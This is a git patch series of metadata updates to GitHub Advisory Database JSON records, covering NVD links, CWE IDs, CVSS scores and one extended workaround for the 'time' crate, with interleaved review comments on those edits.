2fed98112dc02..3e50474af8813 100644 --- a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-49pc-8936-wvfp", - "modified": "2026-02-20T21:14:50Z", + "modified": "2026-02-23T22:30:18Z", "published": "2026-02-20T21:14:49Z", "aliases": [ "CVE-2026-27492" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492" + }, { "type": "WEB", "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" 
@@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:14:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T11:15:57Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json index 0c624b24b1508..f0c42d71f6728 100644 --- a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json +++ b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cxpw-2g23-2vgw", - "modified": "2026-02-20T21:52:44Z", + "modified": "2026-02-23T22:30:08Z", "published": "2026-02-20T21:52:44Z", "aliases": [ "CVE-2026-27576" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxpw-2g23-2vgw" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27576" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/63e39d7f57ac4ad4a5e38d17e7394ae7c4dd0b9c" @@ -71,6 +75,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:52:44Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json index 176c4fd9a0cb9..8036b28542709 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jfv4-h8mc-jcp8", - "modified": "2026-02-20T19:26:42Z", + "modified": "2026-02-23T22:28:47Z", "published": "2026-02-18T17:41:09Z", "aliases": [ "CVE-2026-27486" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jfv4-h8mc-jcp8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27486" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/6084d13b956119e3cf95daaf9a1cae1670ea3557" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:41:09Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json index 0ee743fdace27..f3b862271ec4e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json +++ b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q5fh-2hc8-f6rq", - "modified": "2026-02-20T21:15:26Z", + "modified": "2026-02-23T22:30:32Z", "published": "2026-02-20T21:15:25Z", "aliases": [ "CVE-2026-27482" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/ray-project/ray/security/advisories/GHSA-q5fh-2hc8-f6rq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27482" + }, { "type": "WEB", "url": "https://github.com/ray-project/ray/pull/60526" @@ -59,11 +63,12 @@ ], "database_specific": { "cwe_ids": [ - "CWE-306" + "CWE-306", + "CWE-396" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:15:25Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json index e0bc2d82f86bd..09ffe62f28ac2 100644 
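Review bot: In the `cwe_ids` hunk for GHSA-q5fh-2hc8-f6rq, `"CWE-396"` (Declaration of Catch for Generic Exception) is added next to `"CWE-306"` (Missing Authentication for Critical Function). The two are unrelated weakness classes, and nothing in the visible hunks explains the second. Consumers that route or prioritise on CWE will file this advisory under an error-handling category as well, so it is worth confirming the ID against the upstream record for CVE-2026-27482 before it is published. If it cannot be confirmed, keep the list as `"CWE-306"` alone.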
--- a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json +++ b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qhp6-635j-x7r2", - "modified": "2026-02-20T18:25:27Z", + "modified": "2026-02-23T22:28:57Z", "published": "2026-02-20T18:25:27Z", "aliases": [ "CVE-2026-27480" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/static-web-server/static-web-server/security/advisories/GHSA-qhp6-635j-x7r2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27480" + }, { "type": "WEB", "url": "https://github.com/static-web-server/static-web-server/commit/7bf0fd425eb10dac9bf9ef5febce12c4dd039ce1" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T18:25:27Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json index 82b927d19e9a8..c368f518ef9a8 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json +++ b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r6h2-5gqq-v5v6", - "modified": "2026-02-20T21:05:45Z", + "modified": "2026-02-23T22:29:30Z", "published": "2026-02-20T21:05:45Z", "aliases": [ "CVE-2026-27485" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6h2-5gqq-v5v6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27485" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/pull/20796" 
@@ -71,6 +75,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:05:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json index 6ea03cb2a2cf4..bca4a647a6f96 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json +++ b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w45g-5746-x9fp", - "modified": "2026-02-20T21:13:03Z", + "modified": "2026-02-23T22:29:47Z", "published": "2026-02-20T21:13:03Z", "aliases": [ "CVE-2026-27488" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w45g-5746-x9fp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27488" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/99db4d13e5c139883ef0def9ff963e9273179655" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:13:03Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json index d50dfe80084d3..4f2786d42cc77 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json +++ b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wh94-p5m6-mr7j", - "modified": "2026-02-20T21:02:32Z", + "modified": "2026-02-23T22:29:14Z", "published": "2026-02-20T21:02:31Z", "aliases": [ "CVE-2026-27484" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wh94-p5m6-mr7j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27484" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/775816035ecc6bb243843f8000c9a58ff609e32d" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:02:31Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file From 661e2a198463f74d7895209eb98982338078e3ba Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:35:41 +0000 Subject: [PATCH 68/77] Publish GHSA-r6v5-fh4h-64xc --- .../2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json b/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json index c6a81e92e753f..29d0d85f24a44 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json +++ b/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-r6v5-fh4h-64xc", - "modified": "2026-02-06T21:43:22Z", + "modified": "2026-02-23T22:34:23Z", "published": "2026-02-05T17:57:55Z", "aliases": [ "CVE-2026-25727" ], "summary": "time vulnerable to stack exhaustion Denial of Service attack", - "details": "### Impact\n\nWhen user-provided input is provided to any type that parses with the RFC 2822 format, a Denial of Service attack via stack exhaustion is possible. The attack relies on formally deprecated and rarely-used features that are part of the RFC 2822 format used in a malicious manner. Ordinary, non-malicious input will never encounter this scenario.\n\n### Patches\n\nA limit to the depth of recursion was added in v0.3.47. From this version, an error will be returned rather than exhausting the stack.\n\n### Workarounds\n\nLimiting the length of user input is the simplest way to avoid stack exhaustion, as the amount of the stack consumed would be at most a factor of the length of the input.", + "details": "### Impact\n\nWhen user-provided input is provided to any type that parses with the RFC 2822 format, a denial of service attack via stack exhaustion is possible. The attack relies on formally deprecated and rarely-used features that are part of the RFC 2822 format used in a malicious manner. Ordinary, non-malicious input will never encounter this scenario.\n\n### Patches\n\nA limit to the depth of recursion was added in v0.3.47. From this version, an error will be returned rather than exhausting the stack.\n\n### Workarounds\n\nLimiting the length of user input is the simplest way to avoid stack exhaustion, as the amount of the stack consumed would be at most a factor of the length of the input.\n\nAlternatively, avoiding the format altogether would also ensure that the vulnerability is not encountered. To do this, add\n\n```toml\ndisallowed-types = [\"time::format_description::well_known::Rfc2822\"]\n```\n\nto your `clippy.toml` file. 
This will trigger the `clippy::disallowed_types` lint, which is warn-by-default and can be explicitly denied.", "severity": [ { "type": "CVSS_V4", From 60eb5ccd67928d59d33978770a08537888461d89 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:40:16 +0000 Subject: [PATCH 69/77] Publish GHSA-mjjp-xjfg-97wg --- .../2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json b/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json index 97603d35e3f8a..c3eab04b2637f 100644 --- a/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json +++ b/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mjjp-xjfg-97wg", - "modified": "2026-01-13T18:31:53Z", + "modified": "2026-02-23T22:38:58Z", "published": "2026-01-10T12:30:16Z", "aliases": [ "CVE-2025-15504" @@ -102,7 +102,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "LOW", "github_reviewed": true, From cdb3c51acb704dfb758a686f1f832e683a6e2896 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:42:08 +0000 Subject: [PATCH 70/77] Publish GHSA-2g4f-4pwh-qvx6 --- .../2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json index b2ed54fec1747..d88bb33cb349a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json 
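Review bot: The new workaround paragraph in `details` for GHSA-r6v5-fh4h-64xc describes `clippy::disallowed_types` as "warn-by-default", so a project that follows it as written only gets a warning and can still ship code that parses with `Rfc2822`. Clippy also checks only the crates it is run on, so a dependency that parses RFC 2822 input through `time` is not covered by a `clippy.toml` entry in the application. I would extend the sentence to say that the lint should be denied in CI, for example with `#![deny(clippy::disallowed_types)]`. It should also say that the workaround covers first-party code only, with the upgrade to v0.3.47 remaining the fix for transitive use.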
+++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-20T20:59:11Z", + "modified": "2026-02-23T22:40:29Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6" + }, { "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" @@ -90,6 +94,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1333", "CWE-400" ], "severity": "MODERATE", From 25b7d8a900fe5b11d53cc4b344df7396e8fbdc88 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:47:13 +0000 Subject: [PATCH 71/77] Publish GHSA-5mg8-w23w-74h3 --- .../2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json index 1c32e88eef1cb..a20e6bc61de8e 100644 --- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json +++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json 
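Review bot: The `ADVISORY` reference added in the `@@ -75,6 +75,10 @@` hunk is `https://github.com/advisories/GHSA-2g4f-4pwh-qvx6`, which is this record's own `id`. It gives a reader or an automated enricher no independent source. The other advisories in this patch series add the NVD page for their alias instead. If the references list outside this hunk does not already have it, `"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"` would be the consistent choice. The full `references` array is not visible here, so this may be a duplicate check rather than a replacement.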
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5mg8-w23w-74h3",
- "modified": "2023-08-18T15:56:36Z",
+ "modified": "2026-02-23T22:45:53Z",
 "published": "2021-03-25T17:04:19Z",
 "aliases": [
 "CVE-2020-8908"
 ],
 "summary": "Information Disclosure in Guava",
- "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n",
+ "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.",
 "severity": [
 {
 "type": "CVSS_V3",
From b6c5c521bd7037ac043dfa5e065a82e2d85dcc43 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 00:33:02 +0000 Subject: [PATCH 72/77] Advisory Database Sync --- .../GHSA-279c-6crv-5wxc.json | 11 +++- .../GHSA-2v7m-mcj3-m7h7.json | 11 +++- .../GHSA-2whc-3gm8-r8v3.json | 11 +++- .../GHSA-33jq-j95r-2gpj.json | 33 ++++++++++ .../GHSA-34rh-x3gg-rqg4.json | 60 +++++++++++++++++++ .../GHSA-3m9c-j7xc-gc2c.json | 56 +++++++++++++++++ .../GHSA-3r56-xx7r-cr9c.json | 11 +++- .../GHSA-43rm-rg7w-7rjf.json | 11 +++- .../GHSA-4fwr-9c58-jg7x.json | 11 +++- .../GHSA-4pmr-jmj5-4gwv.json | 11 +++- .../GHSA-5284-5qqc-v2w8.json | 11 +++- .../GHSA-57vf-72qj-2828.json | 11 +++- .../GHSA-5j3p-mg5x-539j.json | 11 +++- .../GHSA-63v8-38hf-jrfm.json | 11 +++- .../GHSA-6hhh-7cj8-7mp2.json | 47 +++++++++++++++ .../GHSA-76g3-wv5g-g883.json | 11 +++- .../GHSA-877x-j2fm-2mw5.json | 11 +++- .../GHSA-8p6j-8fq8-23rr.json | 11 +++- .../GHSA-972x-fv77-xf59.json | 56 +++++++++++++++++ .../GHSA-97g7-x3h6-6ccc.json | 11 +++- .../GHSA-9mr9-pcmg-4xr7.json | 11 +++- .../GHSA-9w4h-qf26-hvrv.json | 11 +++- .../GHSA-9xx2-jmjv-w5vp.json | 52 ++++++++++++++++ .../GHSA-cvm5-m63f-8wmv.json | 11 +++- .../GHSA-f6pr-2mv6-45fq.json | 11 +++- .../GHSA-fc39-6hhj-gr5p.json | 11 +++- .../GHSA-g3qj-5j85-8w2c.json | 11 +++- .../GHSA-gv3f-578r-jhf3.json | 11 +++- .../GHSA-h68v-wm52-cjcj.json | 34 +++++++++++ .../GHSA-hc97-m5vw-hgpf.json | 11 +++- .../GHSA-j69g-gh5p-j2j3.json | 11 +++- .../GHSA-jxq5-ggfq-q36w.json | 11 +++- .../GHSA-m78j-wv7w-r94w.json | 11 +++- .../GHSA-mhvh-7hfw-2pcj.json | 11 +++- .../GHSA-mq7f-f783-pc94.json | 11 +++- .../GHSA-mqj4-m7cg-hx46.json | 11 +++- .../GHSA-mvmh-gv2w-6hrm.json | 11 +++- .../GHSA-mvp7-2m2r-2548.json | 11 +++- .../GHSA-pf6r-4hv7-pr4f.json | 11 +++- .../GHSA-pj5w-7j3v-9wwv.json | 11 +++- .../GHSA-pjx3-8fqj-x6hr.json | 11 +++- .../GHSA-pq2q-m7vr-7342.json | 11 +++- .../GHSA-pqpv-94jx-68vg.json | 52 ++++++++++++++++ .../GHSA-qvmx-rqmx-pvfg.json | 35 +++++++++++ 
.../GHSA-r8fr-76pj-5h7j.json | 11 +++- .../GHSA-rg2h-mq39-66pf.json | 56 +++++++++++++++++ .../GHSA-rv4c-25xc-4f6g.json | 11 +++- .../GHSA-rw5q-r997-qm48.json | 11 +++- .../GHSA-v534-r4rj-rcvf.json | 11 +++- .../GHSA-vjvc-9fxm-2xw8.json | 11 +++- .../GHSA-vmmw-c3hw-gvm3.json | 33 ++++++++++ .../GHSA-vph5-6p6f-8xpf.json | 11 +++- .../GHSA-w7wv-fvvq-ppfp.json | 11 +++- .../GHSA-wf36-8q2p-m2xg.json | 11 +++- .../GHSA-wg93-hp69-vv5w.json | 44 ++++++++++++++ .../GHSA-x6m2-4qvv-ghf6.json | 11 +++- .../GHSA-xg7c-7v8p-8ww8.json | 11 +++- .../GHSA-xw6c-ffpm-fgcm.json | 44 ++++++++++++++ 58 files changed, 962 insertions(+), 135 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json 
diff --git a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json index 936fd65d0151c..f556811c9af31 100644 --- a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json +++ b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-279c-6crv-5wxc", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69390" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Business Template Blocks for WPBakery (Visual Composer) Page Builder templates-and-addons-for-wpbakery-page-builder allows Reflected XSS.This issue affects Business Template Blocks for WPBakery (Visual Composer) Page Builder: from n/a through <= 1.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json index 5dfb584412d72..0e2ea26fb1574 100644 --- a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json +++ b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2v7m-mcj3-m7h7", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68842" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in totalbounty Widget Logic Visual widget-logic-visual allows Reflected XSS.This issue affects Widget Logic Visual: from n/a through <= 1.52.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json index 247b941cc007e..6b7983db0eb42 100644 --- a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json +++ b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2whc-3gm8-r8v3", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68844" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DaleAB Membee Login membees-member-login-widget allows Reflected XSS.This issue affects Membee Login: from n/a through <= 2.3.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" 
